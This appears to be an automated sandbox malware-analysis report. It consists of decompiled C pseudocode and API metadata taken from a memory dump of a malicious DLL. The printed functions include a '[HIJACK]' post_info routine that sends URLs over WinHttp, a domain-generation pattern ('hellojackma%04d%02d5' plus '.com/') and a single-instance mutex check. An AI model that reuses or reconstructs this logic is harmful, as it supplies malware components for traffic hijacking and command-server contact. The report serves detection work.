                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1662683381-0
                                                                                                                                                                  • Opcode ID: 95b815981802653688cc0cebbafbd1d3d34d1eb17374ba65d4117c0aeae8b2e9
                                                                                                                                                                  • Instruction ID: 106076030708d108cc7be60c426ae776d5d8c147d49c5448cdaefb0738cd9b5f
                                                                                                                                                                  • Opcode Fuzzy Hash: 95b815981802653688cc0cebbafbd1d3d34d1eb17374ba65d4117c0aeae8b2e9
                                                                                                                                                                  • Instruction Fuzzy Hash: B5F02E37204252A9F328E7351C02C4F3784DF827F1721092DF157E80E1EE21D9815560
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10022DFB, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                  			E10022DFB(void* __ebx, void* __edi, void* __esi) {
				void* _t72;
				void* _t73;
				void* _t76;
				void* _t110;
				void* _t112;

				L0:
				while(1) {
					L0:
					_t109 = __esi;
					_t108 = __edi;
					_t77 = __ebx;
					 *((intOrPtr*)(_t110 - 0x2c)) =  *((intOrPtr*)(_t110 - 0x2c)) + 1;
					L1:
					_t118 =  *((intOrPtr*)(_t110 - 0x2c)) - 6;
					if( *((intOrPtr*)(_t110 - 0x2c)) <= 6) {
						L2:
						E100011C0(_t110 - 0x80, 0x10025cba);
						 *((intOrPtr*)(_t110 - 0xe8)) = E10022710(__ebx, __edi, __esi, _t118, _t110 - 0xbc,  *((intOrPtr*)(_t110 - 0x2c)));
						 *((intOrPtr*)(_t110 - 0xec)) =  *((intOrPtr*)(_t110 - 0xe8));
						 *((char*)(_t110 - 4)) = 5;
						E10001A70(_t110 - 0x80,  *((intOrPtr*)(_t110 - 0xec)));
						 *((char*)(_t110 - 4)) = 4;
						E100011A0(_t110 - 0xbc);
						 *((intOrPtr*)(_t110 - 0xf0)) = E10001160(_t110 - 0xd8, _t118,  *((intOrPtr*)(_t110 + 0xc)));
						 *((intOrPtr*)(_t110 - 0xf4)) =  *((intOrPtr*)(_t110 - 0xf0));
						 *((char*)(_t110 - 4)) = 6;
						E10001A90(_t110 - 0x80,  *((intOrPtr*)(_t110 - 0xf4)));
						 *((char*)(_t110 - 4)) = 4;
						E100011A0(_t110 - 0xd8);
						_push(E100011E0(_t110 - 0x80));
						_push(0x61);
						_push("post_info");
						E1001F230(__edi, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp"));
						E100011C0(_t110 - 0x28, 0x10025cbb);
						E100011C0(_t110 - 0x48, 0x10025cce);
						_t72 = E10001200(_t110 - 0x64);
						_t73 = E100011E0(_t110 - 0x64);
						E10021C30(__ebx, __edi, __esi, _t118, 0, 0, 0, E100011E0(_t110 - 0x80), 2, 1, 0, _t73, _t72, 0, 0, 0, 0, 0, 0, _t110 - 0x28, _t110 - 0x48);
						_t112 = _t112 + 0x60;
						_t76 = E10001200(_t110 - 0x28);
						_t119 = _t76;
						if(_t76 == 0) {
							L4:
							continue;
						}
					}
					L5:
					_push( *((intOrPtr*)(_t110 - 0x84)));
					E1000CA40(_t77, _t108, _t109, _t119);
					E10001110( *((intOrPtr*)(_t110 + 8)), _t119, _t110 - 0x48);
					 *(_t110 - 0xdc) =  *(_t110 - 0xdc) | 0x00000001;
					 *((char*)(_t110 - 4)) = 3;
					E100011A0(_t110 - 0x48);
					 *((char*)(_t110 - 4)) = 1;
					E100011A0(_t110 - 0x28);
					 *((char*)(_t110 - 4)) = 0;
					E100011A0(_t110 - 0x64);
					 *((intOrPtr*)(_t110 - 4)) = 0xffffffff;
					E100011A0(_t110 - 0x80);
					 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
					return  *((intOrPtr*)(_t110 + 8));
					L6:
				}
			}








                                                                                                                                                                  0x10022dfb
                                                                                                                                                                  0x10022dfb
                                                                                                                                                                  0x10022dfb
                                                                                                                                                                  0x10022dfb
                                                                                                                                                                  0x10022dfb
                                                                                                                                                                  0x10022dfb
                                                                                                                                                                  0x10022e01
                                                                                                                                                                  0x10022e04
                                                                                                                                                                  0x10022e04
                                                                                                                                                                  0x10022e08
                                                                                                                                                                  0x10022e0e
                                                                                                                                                                  0x10022e16
                                                                                                                                                                  0x10022e2e
                                                                                                                                                                  0x10022e3a
                                                                                                                                                                  0x10022e40
                                                                                                                                                                  0x10022e4e
                                                                                                                                                                  0x10022e53
                                                                                                                                                                  0x10022e5d
                                                                                                                                                                  0x10022e71
                                                                                                                                                                  0x10022e7d
                                                                                                                                                                  0x10022e83
                                                                                                                                                                  0x10022e91
                                                                                                                                                                  0x10022e96
                                                                                                                                                                  0x10022ea0
                                                                                                                                                                  0x10022ead
                                                                                                                                                                  0x10022eae
                                                                                                                                                                  0x10022eb0
                                                                                                                                                                  0x10022ec6
                                                                                                                                                                  0x10022ed6
                                                                                                                                                                  0x10022ee3
                                                                                                                                                                  0x10022eff
                                                                                                                                                                  0x10022f08
                                                                                                                                                                  0x10022f23
                                                                                                                                                                  0x10022f28
                                                                                                                                                                  0x10022f2e
                                                                                                                                                                  0x10022f33
                                                                                                                                                                  0x10022f35
                                                                                                                                                                  0x10022f39
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022f39
                                                                                                                                                                  0x10022f35
                                                                                                                                                                  0x10022f3e
                                                                                                                                                                  0x10022f44
                                                                                                                                                                  0x10022f45
                                                                                                                                                                  0x10022f54
                                                                                                                                                                  0x10022f62
                                                                                                                                                                  0x10022f68
                                                                                                                                                                  0x10022f6f
                                                                                                                                                                  0x10022f74
                                                                                                                                                                  0x10022f7b
                                                                                                                                                                  0x10022f80
                                                                                                                                                                  0x10022f87
                                                                                                                                                                  0x10022f8c
                                                                                                                                                                  0x10022f96
                                                                                                                                                                  0x10022fa1
                                                                                                                                                                  0x10022fab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022fab

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 10022710: _memset.LIBCMT ref: 1002276B
                                                                                                                                                                    • Part of subcall function 10022710: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C
                                                                                                                                                                  • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000061,00000000,?,?,?,info=,10025CA2), ref: 10022EBA
                                                                                                                                                                    • Part of subcall function 1001F230: _memset.LIBCMT ref: 1001F25B
                                                                                                                                                                    • Part of subcall function 1001F230: OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Http_memset$DebugFileFindLocalNameOpenOptionOutputPathStringTime
                                                                                                                                                                  • String ID: .\post_info.cpp$[HIJACK][%s][%s][%d]: url = %s$post_info
                                                                                                                                                                  • API String ID: 4078257140-115957201
                                                                                                                                                                  • Opcode ID: 536ff6acf1412ecd6a85183df319c154ebfa3d59a51a68a5e205cc1e31637370
                                                                                                                                                                  • Instruction ID: 4cd3f4f778056951b5cfd2b5c12ca28e1b0ee278467a54424c11d59ecdb1d103
                                                                                                                                                                  • Opcode Fuzzy Hash: 536ff6acf1412ecd6a85183df319c154ebfa3d59a51a68a5e205cc1e31637370
                                                                                                                                                                  • Instruction Fuzzy Hash: C1413D75D11248ABEB18DB94CC92FEDBB74EF18384F5080A8F60A77195EB302A45CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100181BA, Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E100181BA(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1000D555( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E10013A7B( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1000F780(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                                                                  0x100181c2
                                                                                                                                                                  0x100181c9
                                                                                                                                                                  0x100181de
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100181d0
                                                                                                                                                                  0x100181d2
                                                                                                                                                                  0x100181ea
                                                                                                                                                                  0x100181ef
                                                                                                                                                                  0x100181f2
                                                                                                                                                                  0x100181f5
                                                                                                                                                                  0x1001821e
                                                                                                                                                                  0x10018223
                                                                                                                                                                  0x10018227
                                                                                                                                                                  0x100182a8
                                                                                                                                                                  0x100182ba
                                                                                                                                                                  0x100182c3
                                                                                                                                                                  0x100182c5
                                                                                                                                                                  0x10018205
                                                                                                                                                                  0x10018205
                                                                                                                                                                  0x10018208
                                                                                                                                                                  0x1001820a
                                                                                                                                                                  0x1001820d
                                                                                                                                                                  0x1001820d
                                                                                                                                                                  0x1001820d
                                                                                                                                                                  0x1001820d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10018213
                                                                                                                                                                  0x10018287
                                                                                                                                                                  0x10018287
                                                                                                                                                                  0x1001828c
                                                                                                                                                                  0x10018292
                                                                                                                                                                  0x10018295
                                                                                                                                                                  0x10018297
                                                                                                                                                                  0x1001829a
                                                                                                                                                                  0x1001829a
                                                                                                                                                                  0x1001829a
                                                                                                                                                                  0x1001829a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001829e
                                                                                                                                                                  0x10018229
                                                                                                                                                                  0x1001822c
                                                                                                                                                                  0x1001822c
                                                                                                                                                                  0x10018232
                                                                                                                                                                  0x10018235
                                                                                                                                                                  0x1001825c
                                                                                                                                                                  0x1001825f
                                                                                                                                                                  0x1001825f
                                                                                                                                                                  0x10018265
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10018267
                                                                                                                                                                  0x1001826a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001826c
                                                                                                                                                                  0x1001826c
                                                                                                                                                                  0x1001826f
                                                                                                                                                                  0x1001826f
                                                                                                                                                                  0x10018275
                                                                                                                                                                  0x100181e3
                                                                                                                                                                  0x100181e3
                                                                                                                                                                  0x1001827e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001827e
                                                                                                                                                                  0x10018237
                                                                                                                                                                  0x1001823a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001823e
                                                                                                                                                                  0x1001824c
                                                                                                                                                                  0x1001824f
                                                                                                                                                                  0x10018255
                                                                                                                                                                  0x10018257
                                                                                                                                                                  0x1001825a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001825a
                                                                                                                                                                  0x100181f7
                                                                                                                                                                  0x100181fa
                                                                                                                                                                  0x100181fc
                                                                                                                                                                  0x10018202
                                                                                                                                                                  0x10018202
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100181d4
                                                                                                                                                                  0x100181d4
                                                                                                                                                                  0x100181d9
                                                                                                                                                                  0x100181db
                                                                                                                                                                  0x100181db
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100181d9
                                                                                                                                                                  0x100181d2

                                                                                                                                                                  APIs
                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 100181EA
                                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 1001821E
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016BDE,?,?,00000002), ref: 1001824F
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016BDE,?,?,00000002), ref: 100182BD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                                  • Opcode ID: 055a8c03e4689a610b2b33372239977322d8b4542b05d195dfabf953701ab400
                                                                                                                                                                  • Instruction ID: d5078d4910217e7b4ecb4b559098acf50bee0a5cb4f006de64edc12b54e59432
                                                                                                                                                                  • Opcode Fuzzy Hash: 055a8c03e4689a610b2b33372239977322d8b4542b05d195dfabf953701ab400
                                                                                                                                                                  • Instruction Fuzzy Hash: 6131B031A00256EFDB12CFA4CC84AAE7BF9FF01251F168569E8609F091E730DB81DB51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A3D0, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A3D0(void* __ebx, void* __edi, void* __esi, char* _a4) {
				int _v8;
				int _v12;
				short* _v16;

				_v16 = 0;
				_v12 = E1000CAD0(_a4);
				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);
				_t9 = _v8 + 2; // 0x2
				_v16 = L1000CEAF(__ebx, _a4, __edi, __esi, _v8 + _t9);
				_t13 = _v8 + 2; // 0x2
				E1000CF80(__edi, _v16, 0, _v8 + _t13);
				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
				_v16[_v8] = 0;
				return _v16;
			}






                                                                                                                                                                  0x1001a3d6
                                                                                                                                                                  0x1001a3e9
                                                                                                                                                                  0x1001a402
                                                                                                                                                                  0x1001a408
                                                                                                                                                                  0x1001a415
                                                                                                                                                                  0x1001a41b
                                                                                                                                                                  0x1001a426
                                                                                                                                                                  0x1001a442
                                                                                                                                                                  0x1001a44e
                                                                                                                                                                  0x1001a45a

                                                                                                                                                                  APIs
                                                                                                                                                                  • _strlen.LIBCMT ref: 1001A3E1
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3FC
                                                                                                                                                                  • _memset.LIBCMT ref: 1001A426
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A442
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$_memset_strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 745779501-0
                                                                                                                                                                  • Opcode ID: 2e3c2576653a9b42fdd310f43433bf8f26c3ae11fa9d2da111245d4e24b55a0e
                                                                                                                                                                  • Instruction ID: 8dd7a9ca22c507c9c9ca29094530ba01303feab9f029a6df08f7648fa224dc70
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e3c2576653a9b42fdd310f43433bf8f26c3ae11fa9d2da111245d4e24b55a0e
                                                                                                                                                                  • Instruction Fuzzy Hash: 1D11F1B9E00208BFEB14CFD4D895F9EB7B4EB48704F108198FA099B381D671AA058B91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001F5D0, Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E1001F5D0() {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				struct _SYSTEMTIME _v52;
				struct _FILETIME _v60;
				intOrPtr _t31;

				_v28.wYear = 0x7b2;
				_v28.wMonth = 1;
				_v28.wDay = 1;
				_v28.wHour = 0;
				_v28.wMinute = 0;
				_v28.wSecond = 0;
				_v28.wMilliseconds = 0;
				GetSystemTime( &_v52);
				SystemTimeToFileTime( &_v52,  &_v12);
				SystemTimeToFileTime( &_v28,  &_v60);
				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
				asm("sbb eax, [ebp-0x34]");
				_v36 = E1000F2F0(_t31, _v12.dwHighDateTime, 0x2710, 0);
				_v32 = _t31;
				return _v36;
			}










                                                                                                                                                                  0x1001f5d6
                                                                                                                                                                  0x1001f5dc
                                                                                                                                                                  0x1001f5e2
                                                                                                                                                                  0x1001f5e8
                                                                                                                                                                  0x1001f5ee
                                                                                                                                                                  0x1001f5f4
                                                                                                                                                                  0x1001f5fa
                                                                                                                                                                  0x1001f604
                                                                                                                                                                  0x1001f612
                                                                                                                                                                  0x1001f620
                                                                                                                                                                  0x1001f629
                                                                                                                                                                  0x1001f62f
                                                                                                                                                                  0x1001f640
                                                                                                                                                                  0x1001f643
                                                                                                                                                                  0x1001f64f

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 1001F604
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F612
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F620
                                                                                                                                                                  • __aulldiv.LIBCMT ref: 1001F63B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$System$File$__aulldiv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3735792614-0
                                                                                                                                                                  • Opcode ID: 56842ad1edb196f60ab411e144c2dfedf5549195354fdd3cd1ae5dcdf75a643e
                                                                                                                                                                  • Instruction ID: af96395ebe124ed86fc63cf5983e6bcf699a861f8abc8f1b8a76f2a7ba2cf47c
                                                                                                                                                                  • Opcode Fuzzy Hash: 56842ad1edb196f60ab411e144c2dfedf5549195354fdd3cd1ae5dcdf75a643e
                                                                                                                                                                  • Instruction Fuzzy Hash: A501E575D1021DEADB00DFD4C8899EEB7B8FF04304F104649E904A7250EB79668ACB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A150, Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A150(CHAR* _a4) {
				struct _SECURITY_DESCRIPTOR _v24;
				void* _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				int _v44;

				_v44 = 0;
				_v28 = 0;
				InitializeSecurityDescriptor( &_v24, 1);
				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor =  &_v24;
				_v28 = CreateMutexA( &_v40, 0, _a4);
				if(_v28 != 0 && GetLastError() == 0xb7) {
					_v44 = 1;
				}
				return _v44;
			}







                                                                                                                                                                  0x1001a156
                                                                                                                                                                  0x1001a15d
                                                                                                                                                                  0x1001a16a
                                                                                                                                                                  0x1001a17a
                                                                                                                                                                  0x1001a180
                                                                                                                                                                  0x1001a187
                                                                                                                                                                  0x1001a191
                                                                                                                                                                  0x1001a1a4
                                                                                                                                                                  0x1001a1ab
                                                                                                                                                                  0x1001a1ba
                                                                                                                                                                  0x1001a1ba
                                                                                                                                                                  0x1001a1c7

                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A16A
                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A17A
                                                                                                                                                                  • CreateMutexA.KERNEL32(0000000C,00000000,100206C4), ref: 1001A19E
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 1001A1AD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4085719312-0
                                                                                                                                                                  • Opcode ID: dfe9d4db1a26c01aa306363c359991dbed2ed50b1dc0d3df9fdb4fd6b1ce982a
                                                                                                                                                                  • Instruction ID: 3bb7ca3d3a89cab5a40ee6ca153f8139473754825ab1ab767a0ca4e665a0d5f7
                                                                                                                                                                  • Opcode Fuzzy Hash: dfe9d4db1a26c01aa306363c359991dbed2ed50b1dc0d3df9fdb4fd6b1ce982a
                                                                                                                                                                  • Instruction Fuzzy Hash: EC01BB71940309DFEB10DFD0C989BEDBBB4EB08315F600504EA05BA290D7B5AAC5CBA6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10022BBB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E10022BBB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t71;
				void* _t78;

				_t78 = __eflags;
				_push( *(_t71 - 0x1e) & 0x0000ffff);
				E1000CCA3(__edi, _t71 - 0x12c, "hellojackma%04d%02d5",  *(_t71 - 0x20) & 0x0000ffff);
				 *((intOrPtr*)(_t71 - 0x10)) = E1001A4E0(__ebx,  *(_t71 - 0x20) & 0x0000ffff, __edi, __esi, _t78, _t71 - 0x12c);
				 *((intOrPtr*)(_t71 - 0x2f4)) = E10001160(_t71 - 0x27c, _t78,  *((intOrPtr*)(_t71 - 0x10)));
				 *((intOrPtr*)(_t71 - 0x2f8)) =  *((intOrPtr*)(_t71 - 0x2f4));
				 *((char*)(_t71 - 4)) = 0xb;
				E10001A90(_t71 - 0x148,  *((intOrPtr*)(_t71 - 0x2f8)));
				 *((char*)(_t71 - 4)) = 0;
				E100011A0(_t71 - 0x27c);
				_push( *((intOrPtr*)(_t71 - 0x10)));
				E1000CA40(__ebx, __edi, __esi, _t78);
				 *((intOrPtr*)(_t71 - 0x2fc)) = E10001160(_t71 - 0x298, _t78, ".com/");
				 *((intOrPtr*)(_t71 - 0x300)) =  *((intOrPtr*)(_t71 - 0x2fc));
				 *((char*)(_t71 - 4)) = 0xc;
				E10001A90(_t71 - 0x148,  *((intOrPtr*)(_t71 - 0x300)));
				 *((char*)(_t71 - 4)) = 0;
				E100011A0(_t71 - 0x298);
				E10001110( *((intOrPtr*)(_t71 + 8)), _t78, _t71 - 0x148);
				 *(_t71 - 0x29c) =  *(_t71 - 0x29c) | 0x00000001;
				 *((intOrPtr*)(_t71 - 4)) = 0xffffffff;
				E100011A0(_t71 - 0x148);
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return  *((intOrPtr*)(_t71 + 8));
			}





                                                                                                                                                                  0x10022bbb
                                                                                                                                                                  0x10022bbf
                                                                                                                                                                  0x10022bd1
                                                                                                                                                                  0x10022be8
                                                                                                                                                                  0x10022bfa
                                                                                                                                                                  0x10022c06
                                                                                                                                                                  0x10022c0c
                                                                                                                                                                  0x10022c1d
                                                                                                                                                                  0x10022c22
                                                                                                                                                                  0x10022c2c
                                                                                                                                                                  0x10022c34
                                                                                                                                                                  0x10022c35
                                                                                                                                                                  0x10022c4d
                                                                                                                                                                  0x10022c59
                                                                                                                                                                  0x10022c5f
                                                                                                                                                                  0x10022c70
                                                                                                                                                                  0x10022c75
                                                                                                                                                                  0x10022c7f
                                                                                                                                                                  0x10022ca0
                                                                                                                                                                  0x10022cae
                                                                                                                                                                  0x10022cb4
